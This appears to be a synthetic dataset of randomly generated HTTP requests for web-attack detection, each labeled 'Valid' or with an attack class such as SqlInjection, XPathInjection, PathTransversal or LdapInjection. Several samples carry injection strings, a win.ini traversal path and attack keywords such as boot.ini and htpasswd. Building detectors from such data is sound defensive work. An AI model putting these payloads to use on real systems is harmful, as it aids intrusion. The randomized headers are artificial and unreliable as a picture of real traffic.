Authorization: Digest response="6f23F94f7a0dCC76dedEBD248f54Dc8e"
Range: 67795-,06619-,662301-47622
Referer: http://5aof2.de/cHr7.js
TE: trailers,trailers,chunked;q=0.1
Trailer: If-Modified-Since
User-Agent: 5rufsoEMdj http://www.d7nogIsi.com
UA-CPU: x86
UA-Disp: 6817,0716,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 768x653
Via: 8.2 201.158.0.51
Transfer-Encoding: identity
Upgrade: han/8.7, 10s/1.0, cttH8e/9.6, tmdb/9.7, qlteR/5.3
Warning: 369 73.254.252.135 "st2nea" "Wed, 08 Nov 06 03:43:52 GMT"
X-Forwarded-For: 43.162.121.32
X-Serial-Number: 61444229813363
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

pdzne2nsRmw=ttesoeejys&dI=dunionio

End - Id: 5631
Start - Id: 28371
class: Valid
GET /q_HK1tJk/ihmzhriaetngrc/hnyatvifar1pesLdd/pmRkmVvjEFrk_kz2ZnW/Rlh7e1ywesezltHnl/ne/nic4DxZ.bin?dn=dks5I8s5p6r8gemr&QxJx3mhaKVVmocha=brir HTTP/1.0
Host: 229.247.78.72
Connection: close
Accept: */*
Accept-Charset: windows-1257, utf-8, windows-1253;q=0.5, windows-1255;q=0.3, windows-1252;q=0.7
Accept-Encoding: deflate, gzip;q=0.0, compress, identity
Accept-Language: Tf-p;q=0.0
Cache-Control: max-stale=9
Client-ip: 230.148.204.47
Cookie: irta8idBriaH9Be=/<si-select1w;pbspbamtei=sYsm;nedutlUc0=06493;akd6ttwm9o=139
Cookie2: $Version="946"
Date: Thu, 16 Oct 08 10:57:38 GMT
ETag: W/"Rv9qS5.Q4IyyTJEOsj"
Expect: 100-continue
From: stmeR@qTts.com
If-Modified-Since: Fri, 01 Sep 06 08:51:06 CET
If-Unmodified-Since: Thu, 11 Mar 10 02:55:06 CET
If-Match: "6OjRIhX9gOBk3WVUiIX"
If-None-Match: "elWmFQd759_tZ4-pu"
If-Range: Tue, 06 Jan 09 21:06:54 UTC
Max-Forwards: 2414
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest username="itd3MleO"
Authorization: NTLM emVtelRMM2VFbmlmNGxJMmV6eUFzaWNnbGhsTmVlZHI=
Range: 665026-
Referer: /tahWtcq/obeatS1e/scinuab/nopSrh.exe
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: 6yi1 (nX.gdD; fe9KRY6yve)
UA-CPU: StrongARM
UA-Disp: 780,2913,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 965x809
Via: 8.8 www.nEll.htm, 3.6 www.erlo.js, 6.8 www.onyIa.png
Transfer-Encoding: gzip
Upgrade: oyEin/2.3, temss/5.1, eetil/2.9, fta/0.0
Warning: 347 147.194.234.174 "AYtgenf8eueNtskYttu" 
X-Forwarded-For: 156.99.87.237
X-Serial-Number: 7465297368
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28371
Start - Id: 7493
class: Valid
PUT /n4bMax9BYRMyju/als1dhdxg/eKx0oSYmf-3jLEB/4zieo4ohdyn8radTauj/ea/qoig3n/NCKDincludeqNjhttptB/umu8ie3eelrin/sxECqo.html? HTTP/1.0
Content-Length: 140
Content-Language: 3ergv
Content-Encoding: compress
Content-Location: /0xt3dv/lttHca8/dvtah7ha/oliwne/yI5hhta.gif
Content-MD5: aUhiYTJoeXN0cnludGFuYw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 08 Jun 06 15:39:29 UTC
Last-Modified: Sun, 12 Dec 04 19:20:34 CET
Host: 70.25.146.62:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: hth-mdc4angp;q=0.9, igi-l5E8sw, 8lhtwc6-a
Cache-Control: no-store
Client-ip: 156.50.249.230
Cookie: r2yes=9;n56sss72al5=dkOoKwXkN2
Cookie2: $Version="4"
Date: Sun, 10 Dec 06 05:08:25 GMT
ETag: W/"t7V-e76QnMF3aDx5RZ1O"
Expect: 100-continue
From: nx7o@olnt1.uk
If-Modified-Since: Thu, 18 Aug 05 22:50:51 CET
If-Unmodified-Since: Fri, 03 Nov 06 19:36:38 GMT
If-Match: *
If-None-Match: "Xg6_vV.naTWmRFS-QY"
If-Range: "SmlFH5awiAEXEzY07"
Max-Forwards: 0
MIME-Version: 7.9
Pragma: Edy='o'
Proxy-Authorization: NTLM bndlMWV3ZWplbnJlTXdpc2llZlNkVEl6OXR0dG5lbm5lbjJTOQ==
Authorization: NTLM Y29zcklpYWVodWV0YURTN2dkc3docmV3MXlscG9uZGhOc3Rsbw==
Range: -8172
Referer: /nAiorNeE/entekn.swf
TE: chunked,deflate
Trailer: If-None-Match
User-Agent: es7q (6hDNsox-C6; i4he8rw; aZ7UZs2bF; 2nV1txv; r.f.fM6g)
UA-CPU: MIPS
UA-Disp: 4017,6215,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9362x280
Via: erplm/6.1 www.ospeme9.jpg:75250, 8.6 15.173.242.94, HTTP/1.2 163.74.182.98
Transfer-Encoding: deflate
Upgrade: e0Ci/4.7, EtAsx/1.8, hhn/3.1
Warning: 447 135.204.97.7 "asror" 
X-Forwarded-For: 192.154.138.206
X-Serial-Number: 527443957
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~

connectPiP94KI@Bk=e@pQZWjW&se3Taabl=Uwredvboot.inir&iHret=1513187&mlle=eiItiid&rseaxl5=0893&erPebfu=n3gwi&plen=nhas;Ie&Hl=rmSqpamtbrefuh

End - Id: 7493
Start - Id: 30439
class: Valid
GET /tn4eibalsscaedntLg/ree6o3ues57ad7/Osao/sxq7/sAPtY2SBv2hVbdOAJG9/n-gr.HDp/snyorwrtd7jebho/xmlKiSMo/iDQo@sT/g4-8@unionx/mhgi.cgi?sa=9S7frcpyatsokh&Aozn0nDhiiebpT=odwa&e1nayLnwe=lpdnusreiyCRitEhe&dsqewi=Rshutdownc4tiFit%28nlBese%40select%5Ds&rIeyrtoceoblEbt=4Bx5rLAS5&muHU6=o3vWZKoPT&didutowu=htpasswdtInfidsr%3Dsil&xysee2lEroi=15108&knfex=4712148 HTTP/1.1
Host: www.iWe4e.it
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=8868
Client-ip: 112.165.141.242
Cookie: XJInBQXincludeB=eia ;Lfune=ch2ifnrn4sv;eosee=ofk5j_U@3;rl13tsSEhee=7netr;2oeUho0n=d]ee cne+dte1ssx'g
Cookie2: $Version="2"
Date: Wed, 07 Sep 05 21:22:37 UTC
ETag: W/"XoqN0cTxBVFjL2X03m@"
Expect: 100-continue
From: pfgeec@7mrgees.com
If-Modified-Since: Mon, 26 Dec 05 03:42:30 UTC
If-Unmodified-Since: Thu, 03 Apr 08 11:44:14 CET
If-Match: "68D_DUhRTVu_9KQ"
If-None-Match: *
If-Range: Fri, 26 Jun 09 03:07:38 CET
Max-Forwards: 1
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="naosewe"
Authorization: NTLM bmViczF6ZU5ucm55YnRheGJvdW9wb200bGl1dWQ5dHRhc3hndW51SGVhaA==
Range: -8,-760245
Referer: /a0a4nie4.php3
TE: trailers
Trailer: TE
User-Agent: Mozilla/5.7 (compatible; Konqueror/5.0; SunOS sun4u; nnrsl)
UA-CPU: PowerPC
UA-Disp: 2452,8346,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 094x400
Via: FTP/2.8 86.230.207.171
Transfer-Encoding: gzip
Upgrade: dksM/4.0, egtr/5.6, at1f/2.7, Ruilnr/5.9, epf4h3/8.8
Warning: 468 www.emIt4fe.html "irdiBnlnZap" "Mon, 07 Feb 05 01:41:05 UTC"
X-Forwarded-For: 97.116.231.157
X-Serial-Number: 839589841918771
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30439
Start - Id: 42334
class: SqlInjection
GET /ij.hkCt3EzrrfE/nmEDVw/v.rffGFo7eB-MniTyJV/FM68U_/gAndjs@KIIkQU5/ardgcFZnb/eeOea/nUtaHw/sNnAxUC/1hcHS4y78mB45Ge-7@W/fvDqxzIR.mdb?UaUXt=bhavingdgo&OugpoOiotsrG=e61Pb&soaOnatsuhaghi=58203&non6o=oe&iCsoma=tEuLe9-I&LfD0-7h1aq=+&jLedmrmrOhc3=ghp&enjuellrREalshw=ipC7j&IrsfCdpi=OpT&cEi=%27select+customer_phone+++%27%7C%7C%27from++++customers+%27%7C%7C%27where+++++customer_surname%3D%27%27%27%7C%7C+++++lv_surname%7C%7C%27%27%27++and++++customer_type%3D1%27%3B&plnaotltp=7713&eiahuethe=51L4z HTTP/1.1
Host: www.qelj7n.cz:80
Connection: xlnnysrn
Accept: video/mpeg, audio/*, audio/basic
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, identity, identity;q=0.9, identity;q=0.1, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 59.166.67.8
Cookie: oielz=ose5ntbsEwivht;5eoivtrtccPui=244142;Eoeiazn6ti=83502
Cookie2: $Version="77"
Date: Mon, 30 Jan 06 06:53:01 CET
ETag: "_05h89GLjeFPIMmU"
Expect: 100-continue
From: dtce1iim@oe8uountoe.de
If-Modified-Since: Thu, 05 Feb 04 05:29:01 GMT
If-Unmodified-Since: Fri, 09 Feb 07 13:45:23 GMT
If-Match: *
If-None-Match: "kAFoLo6@VRtu3Cb"
If-Range: Fri, 20 Aug 04 09:40:20 GMT
Max-Forwards: 168
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Basic ZWRhdzpsb2dFaA==
Range: -183629,81875-7
Referer: http://www.rqe5uc.gov/aiVsesT.asmx
TE: deflate;q=0.7,deflate,trailers
Trailer: Accept-Encoding
User-Agent: 6fuh (6FdyRCEb4; a@x1x0; eVj2eZuX; oJbIX4IK; aSZfKT)
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 999x243
Via: xdan/8.0 www.dls3tia.png
Transfer-Encoding: deflate
Upgrade: tkdit/5.2
Warning: 478 44.68.67.163:8 "haHdehmpgh" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 43766358
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42334
Start - Id: 7950
class: Valid
POST /isRwalAetbtmia/obdw8QyM8SZu@9/htM/h_5D/MQ/W3SKgUaand3uobgsoundBIC/o7@6zp2W6lqt/arTc5svtc0rtmd/jFrjrzGbjA5IIf/kW.IV2su/rX@dzLIUrw2@.tiff? HTTP/1.1
Content-Length: 240
Content-Language: qvonoce,njH,egsgs
Content-Encoding: gzip
Content-Location: /hrnvrhn/Mois2/i5rtzj/essMesan.tar
Content-MD5: Ym1kN2hkYmVvcG1sY282dQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 07 Sep 04 09:06:25 CET
Last-Modified: Thu, 20 Jul 06 17:41:07 GMT
Host: www.lfnr.uk
Connection: keep-alive
Accept: application/*, video/*;q=0.5, text/*
Accept-Charset: cp-932;q=0.2, x-mac-arabic;q=0.5
Accept-Encoding: 
Accept-Language: hjj-R
Cache-Control: max-stale
Client-ip: 225.243.67.249
Cookie: fYSinv7hGm=804
Cookie2: $Version="3"
Date: Thu, 13 Nov 08 16:23:33 GMT
ETag: "tWBFFWmdwsjtHx6D"
Expect: ociler7e
From: uyh9nAn@dvblu.it
If-Modified-Since: Fri, 06 Jun 08 23:15:40 GMT
If-Unmodified-Since: Thu, 14 Aug 08 20:27:32 GMT
If-Match: "w_EQUHrESRxX2HLd"
If-None-Match: *
If-Range: Tue, 15 Nov 05 05:02:24 UTC
Max-Forwards: 391
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic a3B3UGl1Omh0bWl0dHhl
Authorization: Digest realm
Range: -0226,-162
Referer: /selonagm/Hl24ec.pdf
TE: trailers,deflate;q=0.6,deflate;q=0.3
Trailer: Cache-Control
User-Agent: M8ne3 (odjEsyV)
UA-CPU: MIPS
UA-Disp: 1557,362,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7210x017
Via: 6.4 www.lam5.html, FTP/4.9 www.tmnhTt.jpeg:9
Transfer-Encoding: deflate
Upgrade: VSois/6.3, tfeN/4.9, tbc/5.6, iuyt/9.4, zza/9.7
Warning: 024 www.O7oep.htm "aennnrtyleRmrdHsfeP" "Wed, 26 May 04 05:12:06 CET"
X-Forwarded-For: 88.220.41.73
X-Serial-Number: 940687449310
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

hrXaa5riscSsiu=5KKZ&1il=48017741&im=098436&teshmsoc=|9t%uuumwgo6m5rm&rxmI3=irleiicwt4sdeai7ti&ZbRM1OWIMm=ioyutmem?oe&5atptaethbA0=Sonmrids5oartna&cdls=75598&mgErwaynslgt=hhswOeo&tel=s(tew)o3edrop<&$e<stdin&ge=d2skafe67toxf

End - Id: 7950
Start - Id: 4976
class: Valid
POST /NCserviceszuhomefi/l1dSudDM-a/Ds7odeigitcrrAtajex/Ce5lggaanjerhlkts/dqdl/aQ6./hEgIWg.php4? HTTP/1.1
Content-Length: 260
Content-Language: 5lm
Content-Encoding: deflate
Content-Location: http://Ecnreenl.be/eaim.tiff
Content-MD5: Z2lhbWU1ZWVoYmhlbDloeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Mar 07 20:07:20 CET
Last-Modified: Wed, 24 Jan 07 16:54:17 UTC
Host: www.egii.uk
Connection: B66y
Accept: image/jpeg;q=0.2, application/rtf, video/*;q=0.2
Accept-Charset: *
Accept-Encoding: identity;q=0.2, compress;q=0.6, gzip;q=0.0, gzip;q=0.1, deflate;q=0.8
Accept-Language: *
Cache-Control: max-age=49779
Client-ip: 95.111.25.133
Cookie: El7Z=tnntxp_ishutdownl16d
Cookie2: $Version="1"
Date: Fri, 02 Oct 09 20:40:59 CET
ETag: "E6Q_HzRmW4MH.Tv2NR-"
Expect: 100-continue
From: zqhtasa7@rsaljt.it
If-Modified-Since: Sat, 23 Jan 10 21:47:03 CET
If-Unmodified-Since: Sun, 09 Jan 05 10:45:03 GMT
If-Match: "C8RgJ@YVOJEii2YbB"
If-None-Match: "fG-LSAqeWA5fXzEW7_.n"
If-Range: Wed, 03 Dec 08 04:11:13 UTC
Max-Forwards: 4
MIME-Version: 8.6
Pragma: nuiea='rstn'
Proxy-Authorization: NTLM eWxvbHNtZTZJYklvZXRuN3lyNkhyemF3ZXN3RWVkdGJqM3NrZzNl
Authorization: NTLM ZW90dGl0Zm5lcndsZG5zRWdoN3Flc2Ewc2U4SGk3aG1yb3MzbnJMbGY=
Range: 761141-,55-235224
Referer: /iI5inv/ybeifodi/uat6/iltTfeu.gif
TE: trailers,gzip;q=0.1,gzip;q=0.1
Trailer: From
User-Agent: d5X0Yv_ http://www.Ohoewe.de
UA-CPU: Sparc
UA-Disp: 1425,8375,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 527x0259
Via: 5.2 99.210.183.197, 8.3 67.242.2.95, FTP/3.3 www.dihsx89.gif
Transfer-Encoding: iechsi
Upgrade: m6it/1.3, twoi/6.0, yaat/2.8, 4um5c8/3.5
Warning: 173 28.187.74.144 "intyt8" "Wed, 16 Jan 08 01:05:54 UTC"
X-Forwarded-For: 26.142.203.81
X-Serial-Number: 3100317318115604683
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3B69=sje;clIan;winnt&evalnc3Ew=1&uT6S7nullrHEcQ=7621&rr7Eteene=d5EIVKT&od4zm5reic4h=12318784&ic6e=ixmlt&Fhmth5do=58ainrn&@BOp@aZNboot.iniE=HrcihuoaliedkSi0t&tteeleeeaaes2w=aa6PJhYQIcX&jasytyuBH=tail&@cmMR-T2=tGis&annlfhl2aeeFt=n3uH-HOQQwmM&ioq78etipwt=fzoe

End - Id: 4976
Start - Id: 24059
class: Valid
GET /5iframe2xmail3OmHUAaWqY/8fMfnqZEas8qdropA/fy28a_JJ/h.ujmfCI/6stNtcsnsilpfit/XUhTn1ZBJu.htm?o0itaceh=53288 HTTP/1.0
Host: www.e6stakeuc.com:7319
Connection: ire84
Accept: */*
Accept-Charset: euc-cn, cp-936;q=0.6
Accept-Encoding: *
Accept-Language: n1n-hlloa;q=0.6
Cache-Control: no-cache
Client-ip: 40.95.111.65
Cookie: nUtBaRrotlcKov=teaftp;whm4no2Llmasosh=qie;h1ytopXe11e=zlMwrc
Cookie2: $Version="33"
Date: Tue, 05 May 09 18:08:32 UTC
ETag: "umI_-qtKS5ZTs4RPE.y"
Expect: 100-continue
From: q3rQEeds@pacae.de
If-Modified-Since: Sun, 08 Oct 06 17:17:34 GMT
If-Unmodified-Since: Sat, 21 Oct 06 06:32:00 UTC
If-Match: "U_Icc@REkg6Dq_3XbCF"
If-None-Match: "D42q1vFSGV7I@Ik6uJ"
If-Range: "QT4QdpVO6_ujpehZ3QD7"
Max-Forwards: 6554
MIME-Version: 6.0
Pragma: d='taEarh'
Proxy-Authorization: 5pue neoh0ai=ade4maHi
Authorization: twtegg j4ttvan=obee
Range: 069046-944927
Referer: /shsauh/oea0sw/nmuocs/lsathd.tar.gz
TE: deflate;q=0.2,chunked,gzip;q=0.2
Trailer: Accept-Charset
User-Agent: 5mHpp (eiJSXZ_; hCWryr0.; ipVrNTw; e30QZm-XP; nDN2mGPl-)
UA-CPU: x86
UA-Disp: 176,3441,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 775x0014
Via: 6.3 www.htwie1.gif, 6.2 www.tistAhe.js, HTTP/4.6 www.iosLtft.html
Transfer-Encoding: deflate
Upgrade: mer/2.5
Warning: 493 www.eltyLh9i.html:80426 "8ieAg" "Tue, 23 Jan 07 08:40:05 UTC"
X-Forwarded-For: 147.32.251.83
X-Serial-Number: 4272941
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24059
Start - Id: 11134
class: Valid
GET /fnuaiTt0u/exiarul8aethekn0/pttu2egtrFItSdE/rNumheertmcin/6_texofS@/toetpnsctha/vesicD2eusyoh7aNiiee/aRqaDP-T.oAX/g9EE9i7xwfo_JlF6VW.htm? HTTP/1.0
Host: 157.243.81.160
Connection: sws57sa
Accept: */*
Accept-Charset: iso-8859-3;q=0.3, iso-8859-8-i, euc-kr;q=0.4
Accept-Encoding: *
Accept-Language: jss-tf0qekn, essii-oe
Cache-Control: arIsm='a'
Client-ip: 149.97.12.43
Cookie: bfaieodnwEu1ol=lht;uosmaFfdie=070873791
Cookie2: $Version="8"
Date: Tue, 21 Sep 04 18:55:37 GMT
ETag: W/"4E6Sz89.qjbnVEhPx_"
Expect: 100-continue
From: lQbqTa@Erdtpio.net
If-Modified-Since: Wed, 27 Feb 08 14:51:02 GMT
If-Unmodified-Since: Wed, 04 Jan 06 08:03:19 GMT
If-Match: "pKLlfiYTT0YXSIxW"
If-None-Match: "Tnb2tBeENbkJR0OjrTI"
If-Range: Wed, 30 Jan 08 23:06:29 GMT
Max-Forwards: 4147
MIME-Version: 9.1
Pragma: mrrm='a0'
Proxy-Authorization: Digest response="FF6f55D1baDeb6c2C872bb57B9eB0aDd"
Authorization: Basic ZHRIbnZzOmNkSGFtZW5z
Range: -71,-21606
Referer: http://www.sskidrnm.biz/xctlo/tnhp7ebp.jsp
TE: deflate,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.2 (X11; U; Linux i586 5.1; e8-ah; rv:4.2.8) Gecko/34011821
UA-CPU: 68000
UA-Disp: 8419,120,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 571x624
Via: 1.9 www.xftaejte.tiff, FTP/5.0 www.thu0aR.gif
Transfer-Encoding: identity
Upgrade: hgrW/3.1
Warning: 864 51.124.226.139:114 "jlvcgsocjhnvs" 
X-Forwarded-For: 114.27.214.142
X-Serial-Number: 06776910679420292948
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11134
Start - Id: 48368
class: XPathInjection
GET /kzrxLQ_JV_c.uh.Ds/Ucid/io6atsNmmcmoe25aQm.mspx?fEeeniqtsm=4295&orhAakLaati3ta=%3Am&eeageuease=608&lhs1q7I2ndSeOxt=75sconteaskortsof&dntac=oe2hs2sTef&tnc=6r686leouopowd3a&XJTQu9giJT1=dN&rplucyineemN=3tbi3e HTTP/1.1
Host: www.dawieh.org:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: identity, identity, identity;q=0.2, identity
Accept-Language: tls-ierx;q=0.4, gprd-rn, wfetek-a
Cache-Control: lf=w
Client-ip: 127.253.106.46
Cookie: WIQandutelnet=5262;tfuesetnnes=r2rled1Vceiaeise;hethn=rooebai9pbmacbCiet;ersgb=hdEWrTcopyeeat;90GacceptVdpUMm=hEFLdA0-RGAi
Date: Sun, 11 Dec 05 23:10:45 CET
ETag: "NYR8UqwqlTgjYhohloi3"
Expect: HetkQ=ev2xa
From: s5al6B3@ostl.it
If-Modified-Since: Fri, 29 May 09 14:02:28 CET
If-Unmodified-Since: Tue, 05 Jun 07 21:14:19 UTC
If-Match: "lat4Vj7FALxclsVQc"
If-None-Match: *
If-Range: Thu, 29 Jan 04 24:06:00 UTC
Max-Forwards: 8647
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: 5rEtt zyep=iae9id
Authorization: NTLM c2EyZWxnbmFvbGtsZmFrZWN1ZW1jYWVlZWVpcjBvTEFC
Range: -101,-0,2257-
Referer: http://www.upeer3hm.gov/dmnrvS/lsop/oiriaeYa/rnkq/a38nnIaq.conf
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Et3rt2Oo'     or  6 <  count(path/child::*)     or   'zrdy' = '
UA-CPU: 68000
UA-Pixels: 516x4086
Via: HTTP/6.5 www.syguecyb.css, FTP/6.5 132.197.45.30
Transfer-Encoding: deflate
Upgrade: osanot/5.5
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48368
Start - Id: 45681
class: PathTransversal
GET /k6a6alm87wbhsuoe/49ces/l.E/tucTaGJ/q.P7eaO8zbodyd/eDAje.php4?E4he1onanspgt=4&gzq=jylo&aeyi=atHr%7Ctams&B9chaving=l%3A%5C%5CWINNT%5C%5Cwin.ini&44OjhcTenchqg7=uoW&I@ULNZA-0a=eoanliyre&DCZRizp@=ih%7E4eLbr%40nSh&5TuonBrTnoo=Ta7hslV1oh9tg5lo&mbpgot6uh=l0Cfu HTTP/1.0
Host: www.binhpurtN.de:02199
Connection: bosua
Accept: application/*, application/zip
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.0, deflate;q=0.4
Accept-Language: rfnsrhv-5dEcD, rctf8o-etdrp;q=0.9, ietl-eaw
Cache-Control: no-cache
Client-ip: 10.24.0.201
Cookie: tenoeso=8mbaeysgroup by nglsbo;aech6sehsytby=562909;iyuaAqahaEupbe=ttaoeS;axa=forbtserAtep
Cookie2: $Version="912"
Date: Wed, 09 Feb 05 04:48:27 UTC
ETag: "oITd6gpcm.9INtKUBAA"
Expect: bEeiah5h=l1sAo
From: esIpsioy@eehlxsang.it
If-Modified-Since: Sun, 02 Aug 09 20:39:00 CET
If-Unmodified-Since: Tue, 11 May 04 13:41:29 UTC
If-Match: *
If-None-Match: "QypQYa_6l6PryVQ8y"
If-Range: "t7pG45miEvj2R@-_i"
Max-Forwards: 3
MIME-Version: 9.9
Pragma: srokA='u'
Proxy-Authorization: Digest cnonce="vhio"
Authorization: Basic cmVnR3Jlbm46c21hYWs=
Range: -934,-807,-703421
Referer: /npEcng/iasaese.jsp
TE: gzip;q=0.2,chunked;q=0.3,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/3.3 (Windows; U; WinNT 6.8; ps-vl; rv:3.2.5) Gecko/57004874
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 488x430
Via: deee/4.1 www.9eohup.png
Transfer-Encoding: identity
Upgrade: Weyge/4.5, 12qen/6.1, nL6/9.1, 0dpMle/5.5, aosm8/0.7
Warning: 242 47.27.151.65 "y4hi" 
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45681
Start - Id: 38281
class: LdapInjection
GET /nhlyynimneE8y34/lsrBn/jEe7mq5trErmht3aaou/aenaetnada8rpqnonEe/7xGS-zk.cfm?sda=o&IPNuqlF=41237574&window.open9lMcMP-H4bW=%3Dcre&vgrrihdwtit=%29++%28++++%7C+%28+cn%3D*o++++%27brien*+%29%28mail+++%3D*o%27brien*%29+++&bhfrgio7r=oy5ale2iTeSe&httpSIMh32stdinxP=4yasierLhp&bEy2thb=7471&hfar=rna%3Erupdateaqm+htpass&asreetatf=hnA&gtirtnIurto2e=iyoes&2qzJWF0c17e=3207422 HTTP/1.0
Host: 226.199.245.11:2
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=8152
Client-ip: 227.248.33.223
Cookie: ghysawinmg=7;roC2om-7mBn.=6xGUa;illHaiduyhyamat=t?ri;ok5ro1t7esGv=8nE;a0yAd=hbij0e0ew7Oe7rsiap
Cookie2: $Version="09"
Date: Sun, 11 Oct 09 10:39:26 UTC
ETag: W/"-Hht-R8UXNeiOEIFFnX"
Expect: ggulohsa
From: v2hr@itzs.com
If-Modified-Since: Fri, 14 Mar 08 13:22:08 CET
If-Unmodified-Since: Mon, 23 Oct 06 14:57:08 UTC
If-Match: "5YLzWEbY1zG@z2I"
If-None-Match: "DMm4av6EakS-AZCqD"
If-Range: Wed, 28 Apr 10 01:18:51 UTC
Max-Forwards: 4
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest username="mscm"
Authorization: foo83 eitO=Eectedv
Range: 339-28315
Referer: http://phse.ch/rvasp7/wieos.tiff
TE: deflate,chunked;q=0.7,deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.5 (compatible; ncCaa2wtc; Solaris; eYstr; tdklt; kPsx)
UA-CPU: PowerPC
UA-Disp: 284,6564,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4041x0261
Via: 9.5 www.eAeu.htm, 1.3 www.mR0o.htm
Transfer-Encoding: deflate
Upgrade: segoo/3.8
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 189.204.106.18
X-Serial-Number: 830013506
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 38281
Start - Id: 19581
class: Valid
GET /llindlpdtyBsr/ubAHqjhtavOc4lhulno.swf?eeflX71nsam=28167&hmepUhdrinhsaa=%5D%40&oieyny1ot=6&ly4meg=69&y89t=ot+d0ioo%3E&cpeig=tlenuRyslnt5le&ghbeBfrcanuaw=8338541932&rmnxi=nWQRRF&otpg=8&uiiltsieu=5sen9ehmt6Ursgnh&Gis5seedthem=rzoorigeoDdueO&a8towa6O=twe&Uomk4satsts=rEtn+b HTTP/1.0
Host: www.nkyDoe.org:80
Connection: keep-alive
Accept: text/*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: yeroih-yEhh;q=0.8, e-crij, hptTiest-e, e-uykob;q=0.7, gn-n
Cache-Control: no-transform
Client-ip: 74.39.86.157
Cookie: alEdk0S=59238353;tstNoHu=aad8sm
Cookie2: $Version="35"
Date: Fri, 15 May 09 19:22:03 CET
ETag: W/"SXup_SmNwWOnFcvZiBQ"
Expect: h5Eio
From: 2oda@xtaaa.com
If-Modified-Since: Sun, 26 Aug 07 16:00:43 UTC
If-Unmodified-Since: Wed, 22 Jun 05 09:36:26 GMT
If-Match: "wXlAWpRT.QaU4zC4"
If-None-Match: *
If-Range: Tue, 30 Oct 07 12:37:12 CET
Max-Forwards: 1
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Digest response="26f0Ddd9c3EF6aBbfeE8e5AF980aDe9d"
Authorization: Digest uri=http://aoieILi.de/weroiio/635zm1/zyiennMt/neiorfce.pl
Range: 2778-
Referer: /qddpdaii/48fW/tuesg/ucdrgm0.js
TE: trailers,trailers
Trailer: If-Range
User-Agent: a7pv/7.7.8
UA-CPU: MIPS
UA-Disp: 187,0883,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4605x2042
Via: 8.4 www.eneAo.jpeg:147, HTTP/9.1 www.mtDoe0.png
Transfer-Encoding: compress
Upgrade: tecthp/7.8
Warning: 408 115.192.90.4 "lvsu" 
X-Forwarded-For: 240.111.161.144
X-Serial-Number: 1701611
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19581
Start - Id: 26858
class: Valid
GET /a-LKUkFdQB6hi8RcFVkN/muehEhrxiteu/am6LCIo75d4Tkl5/IxUpu4Q/8gr/eRhstpa/h7AoLvj5oxwYA4A_opm2.php3?awesraj=tss0&Xr6abieht3rdl=6939215036&rcyesrui5=te0%7ESwgethieFseoh&s8oatosi9a=336666&a6boot.iniLDH2meta8EPE=terla&mttms=06246434&aleasey3eztvz=iG6TQaY&rhrlnsnt6sqo=ativrr3s&crsagswc=evUk9JkR&athtrmeis9ivlxe=0actgnitO4hepetc HTTP/1.1
Host: www.sdieinrh5.ch:05086
Connection: close
Accept: audio/x-wav;q=0.9
Accept-Charset: *
